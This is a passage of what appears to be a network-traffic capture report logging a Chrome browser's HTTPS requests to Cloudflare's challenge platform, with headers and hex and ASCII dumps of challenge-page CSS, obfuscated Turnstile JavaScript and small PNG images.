                                        2025-01-07 21:05:59 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                        Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                        2025-01-07 21:05:59 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                        Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                        2025-01-07 21:05:59 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                        Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                        2025-01-07 21:05:59 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                        Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        15192.168.2.449765104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:00 UTC728OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe6e8bcbdc57d11&lang=auto HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/q622a/0x4AAAAAAAAjq6WYeRDKmebM/light/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:00 UTC331INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:00 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 116274
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Server: cloudflare
                                        CF-RAY: 8fe6e8c13ec48c2d-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 21:06:00 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c
                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcl
                                        2025-01-07 21:06:00 UTC1369INData Raw: 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 70 61 67 65 25 32 30 77 61 73 25 32 30 61 63 63 69 64 65 6e 74 61 6c 6c 79 25 32 30 63 61 63 68 65 64 25 32 30 62 79 25 32 30 61 6e 25 32 30 69 6e 74 65 72 6d 65 64 69 61 72 79 25 32 30 61 6e 64 25 32 30 69 73 25 32 30 6e 6f 25 32 30 6c 6f 6e 67 65 72 25 32 30 61 76 61 69 6c 61 62 6c 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70 69 72 65 64 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65 66 72
                                        Data Ascii: is%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_expired":"Expired","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","turnstile_refresh":"Refr
                                        2025-01-07 21:06:00 UTC1369INData Raw: 67 30 2c 67 34 2c 67 61 2c 67 62 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 67 38 2c 67 39 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 37 33 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 38 38 30 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 37 38 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 30 36 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 67 49 28 34 39 38 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 36 37 35 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 30 36 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 32 38 29
                                        Data Ascii: g0,g4,ga,gb,gB,gC,gG,gH,g8,g9){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1373))/1+parseInt(gI(880))/2*(-parseInt(gI(478))/3)+-parseInt(gI(606))/4+parseInt(gI(498))/5+parseInt(gI(675))/6+-parseInt(gI(806))/7*(parseInt(gI(1128)
                                        2025-01-07 21:06:00 UTC1369INData Raw: 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 55 42 69 45 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 6c 48 4a 42 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 63 4d 52 4f 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 66 48 42 4f 42 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 55 42 44 75 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 45 63 59 4a 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 6b 58 6c 64 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72
                                        Data Ascii: ction(h,i){return h|i},'UBiEF':function(h,i){return i==h},'lHJBQ':function(h,i){return i|h},'cMROX':function(h,i){return h>i},'fHBOB':function(h,i){return h<i},'UBDuv':function(h,i){return i|h},'EcYJi':function(h,i){return h&i},'kXldY':function(h,i){retur
                                        2025-01-07 21:06:00 UTC1369INData Raw: 31 32 37 30 29 5d 28 38 2c 73 29 3b 48 3d 64 5b 68 69 28 38 35 35 29 5d 28 48 3c 3c 31 2e 35 39 2c 31 2e 32 35 26 4d 29 2c 64 5b 68 69 28 31 36 37 31 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 68 69 28 36 33 35 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 68 69 28 38 31 33 29 5d 28 48 3c 3c 31 2c 4d 29 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 68 69 28 36 33 35 29 5d 28 64 5b 68 69 28 31 36 31 32 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 68 69 28 31 34 30 34 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 68 69 28 31 31 31 35 29 5d 28 31 36 2c 73 29 3b 48 3d 64 5b 68 69 28 38
                                        Data Ascii: 1270)](8,s);H=d[hi(855)](H<<1.59,1.25&M),d[hi(1671)](I,j-1)?(I=0,G[hi(635)](o(H)),H=0):I++,M>>=1,s++);}else{for(M=1,s=0;s<F;H=d[hi(813)](H<<1,M),j-1==I?(I=0,G[hi(635)](d[hi(1612)](o,H)),H=0):I++,M=0,s++);for(M=C[hi(1404)](0),s=0;d[hi(1115)](16,s);H=d[hi(8
                                        2025-01-07 21:06:00 UTC1369INData Raw: 47 5b 68 69 28 36 33 35 29 5d 28 6f 28 48 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 49 2b 2b 3b 72 65 74 75 72 6e 20 47 5b 68 69 28 35 37 39 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 68 6a 29 7b 72 65 74 75 72 6e 20 68 6a 3d 68 66 2c 64 5b 68 6a 28 35 33 39 29 5d 28 6e 75 6c 6c 2c 68 29 3f 27 27 3a 68 3d 3d 27 27 3f 6e 75 6c 6c 3a 66 2e 69 28 68 5b 68 6a 28 31 34 30 35 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 68 6b 2c 6a 2c 6b 2c 6d 29 7b 69 66 28 68 6b 3d 68 6a 2c 6a 3d 7b 7d 2c 6a 5b 68 6b 28 31 31 39 33 29 5d 3d 68 6b 28 31 36 32 37 29 2c 6a 5b 68 6b 28 38 32 35 29 5d 3d 64 5b 68 6b 28 31 37 39 33 29 5d 2c 6a 5b 68 6b 28 31 35 37 34 29 5d 3d 68 6b 28 31 33 39 32 29 2c 6b 3d 6a 2c 68 6b 28 31 37 35 31 29 21
                                        Data Ascii: G[hi(635)](o(H));break}else I++;return G[hi(579)]('')},'j':function(h,hj){return hj=hf,d[hj(539)](null,h)?'':h==''?null:f.i(h[hj(1405)],32768,function(i,hk,j,k,m){if(hk=hj,j={},j[hk(1193)]=hk(1627),j[hk(825)]=d[hk(1793)],j[hk(1574)]=hk(1392),k=j,hk(1751)!
                                        2025-01-07 21:06:00 UTC1369INData Raw: 5b 68 6c 28 31 33 36 34 29 5d 28 30 2c 49 29 26 26 28 49 3d 6a 2c 48 3d 64 5b 68 6c 28 31 36 31 32 29 5d 28 6f 2c 4a 2b 2b 29 29 2c 4b 7c 3d 28 30 3c 4d 3f 31 3a 30 29 2a 47 2c 47 3c 3c 3d 31 29 3b 78 5b 43 2b 2b 5d 3d 64 5b 68 6c 28 31 36 31 32 29 5d 28 65 2c 4b 29 2c 4e 3d 64 5b 68 6c 28 38 38 39 29 5d 28 43 2c 31 29 2c 42 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4b 3d 30 2c 4c 3d 4d 61 74 68 5b 68 6c 28 39 37 31 29 5d 28 32 2c 31 36 29 2c 47 3d 31 3b 47 21 3d 4c 3b 4d 3d 64 5b 68 6c 28 31 31 31 30 29 5d 28 48 2c 49 29 2c 49 3e 3e 3d 31 2c 64 5b 68 6c 28 31 35 32 35 29 5d 28 30 2c 49 29 26 26 28 49 3d 6a 2c 48 3d 6f 28 4a 2b 2b 29 29 2c 4b 7c 3d 28 30 3c 4d 3f 31 3a 30 29 2a 47 2c 47 3c 3c 3d 31 29 3b 78 5b 43 2b 2b 5d 3d 65 28 4b 29
                                        Data Ascii: [hl(1364)](0,I)&&(I=j,H=d[hl(1612)](o,J++)),K|=(0<M?1:0)*G,G<<=1);x[C++]=d[hl(1612)](e,K),N=d[hl(889)](C,1),B--;break;case 1:for(K=0,L=Math[hl(971)](2,16),G=1;G!=L;M=d[hl(1110)](H,I),I>>=1,d[hl(1525)](0,I)&&(I=j,H=o(J++)),K|=(0<M?1:0)*G,G<<=1);x[C++]=e(K)
                                        2025-01-07 21:06:00 UTC1369INData Raw: 28 67 5b 68 6f 28 31 30 32 31 29 5d 2c 4f 62 6a 65 63 74 5b 68 6f 28 31 36 30 33 29 5d 28 67 5b 68 6f 28 31 30 32 31 29 5d 29 29 3a 67 5b 68 6f 28 31 30 32 31 29 5d 3d 4a 53 4f 4e 5b 68 6f 28 31 31 38 31 29 5d 28 67 5b 68 6f 28 31 30 32 31 29 5d 29 2c 6d 3d 69 7c 7c 68 6f 28 31 37 34 34 29 2c 6e 3d 65 4d 5b 68 6f 28 38 30 39 29 5d 5b 68 6f 28 31 37 30 33 29 5d 3f 27 68 2f 27 2b 65 4d 5b 68 6f 28 38 30 39 29 5d 5b 68 6f 28 31 37 30 33 29 5d 2b 27 2f 27 3a 27 27 2c 6f 3d 6b 5b 68 6f 28 31 37 32 38 29 5d 28 6b 5b 68 6f 28 31 37 32 38 29 5d 28 6b 5b 68 6f 28 31 37 32 38 29 5d 28 6b 5b 68 6f 28 36 31 35 29 5d 28 6b 5b 68 6f 28 31 37 32 38 29 5d 28 68 6f 28 31 33 38 37 29 2b 6e 2c 68 6f 28 36 38 36 29 29 2b 31 2c 68 6f 28 31 36 35 31 29 29 2c 65 4d 5b 68 6f 28
                                        Data Ascii: (g[ho(1021)],Object[ho(1603)](g[ho(1021)])):g[ho(1021)]=JSON[ho(1181)](g[ho(1021)]),m=i||ho(1744),n=eM[ho(809)][ho(1703)]?'h/'+eM[ho(809)][ho(1703)]+'/':'',o=k[ho(1728)](k[ho(1728)](k[ho(1728)](k[ho(615)](k[ho(1728)](ho(1387)+n,ho(686))+1,ho(1651)),eM[ho(
                                        2025-01-07 21:06:00 UTC1369INData Raw: 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 76 5e 73 7d 2c 6a 5b 68 72 28 31 34 34 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 2b 76 7d 2c 6a 5b 68 72 28 39 38 35 29 5d 3d 68 72 28 31 30 36 33 29 2c 6a 5b 68 72 28 38 33 36 29 5d 3d 68 72 28 38 36 39 29 2c 6a 5b 68 72 28 31 36 34 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3e 76 7d 2c 6a 5b 68 72 28 39 32 32 29 5d 3d 68 72 28 37 31 33 29 2c 6a 5b 68 72 28 31 31 32 31 29 5d 3d 68 72 28 31 35 34 35 29 2c 6b 3d 6a 2c 6c 3d 65 5b 68 72 28 37 36 30 29 5d 28 29 2c 6d 3d 6b 5b 68 72 28 38 33 36 29 5d 2c 6b 5b 68 72 28 31 36 34 36 29 5d 28 6c 5b 68 72 28 31 35 39 32 29 5d 28 6d 29 2c 2d 31 29 29 3f 6b 5b 68 72 28 39 32 32 29 5d 21 3d 3d 6b 5b 68 72 28
                                        Data Ascii: (s,v){return v^s},j[hr(1446)]=function(s,v){return s+v},j[hr(985)]=hr(1063),j[hr(836)]=hr(869),j[hr(1646)]=function(s,v){return s>v},j[hr(922)]=hr(713),j[hr(1121)]=hr(1545),k=j,l=e[hr(760)](),m=k[hr(836)],k[hr(1646)](l[hr(1592)](m),-1))?k[hr(922)]!==k[hr(
                                        2025-01-07 21:06:00 UTC1369INData Raw: 7b 7d 2c 66 35 5b 67 4a 28 31 35 33 38 29 5d 3d 66 34 2c 65 4d 5b 67 4a 28 35 35 36 29 5d 3d 66 35 2c 66 37 3d 65 4d 5b 67 4a 28 38 30 39 29 5d 5b 67 4a 28 31 31 38 37 29 5d 5b 67 4a 28 31 38 31 32 29 5d 2c 66 38 3d 65 4d 5b 67 4a 28 38 30 39 29 5d 5b 67 4a 28 31 31 38 37 29 5d 5b 67 4a 28 31 30 37 38 29 5d 2c 66 39 3d 65 4d 5b 67 4a 28 38 30 39 29 5d 5b 67 4a 28 31 31 38 37 29 5d 5b 67 4a 28 35 36 31 29 5d 2c 66 6c 3d 21 5b 5d 2c 66 78 3d 75 6e 64 65 66 69 6e 65 64 2c 65 4d 5b 67 4a 28 31 35 37 33 29 5d 28 67 4a 28 31 32 35 35 29 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 69 6b 2c 64 2c 65 29 7b 69 6b 3d 67 4a 2c 64 3d 7b 27 4c 6b 66 49 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 3d 3d 3d 66 7d 2c 27 78 75 53 54 45 27 3a 66 75 6e
                                        Data Ascii: {},f5[gJ(1538)]=f4,eM[gJ(556)]=f5,f7=eM[gJ(809)][gJ(1187)][gJ(1812)],f8=eM[gJ(809)][gJ(1187)][gJ(1078)],f9=eM[gJ(809)][gJ(1187)][gJ(561)],fl=![],fx=undefined,eM[gJ(1573)](gJ(1255),function(c,ik,d,e){ik=gJ,d={'LkfIk':function(f,g){return g===f},'xuSTE':fun


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        16192.168.2.449766104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:00 UTC740OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/q622a/0x4AAAAAAAAjq6WYeRDKmebM/light/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:00 UTC240INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:00 GMT
                                        Content-Type: image/png
                                        Content-Length: 61
                                        Connection: close
                                        cache-control: max-age=2629800, public
                                        Server: cloudflare
                                        CF-RAY: 8fe6e8c16c5b0f83-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 21:06:00 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        17192.168.2.449771104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:01 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:01 UTC240INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:01 GMT
                                        Content-Type: image/png
                                        Content-Length: 61
                                        Connection: close
                                        cache-control: max-age=2629800, public
                                        Server: cloudflare
                                        CF-RAY: 8fe6e8c54d2b8ce8-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 21:06:01 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        18192.168.2.449772104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:01 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe6e8bcbdc57d11&lang=auto HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:01 UTC331INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:01 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 110665
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Server: cloudflare
                                        CF-RAY: 8fe6e8c7bdd6c323-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 21:06:01 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70
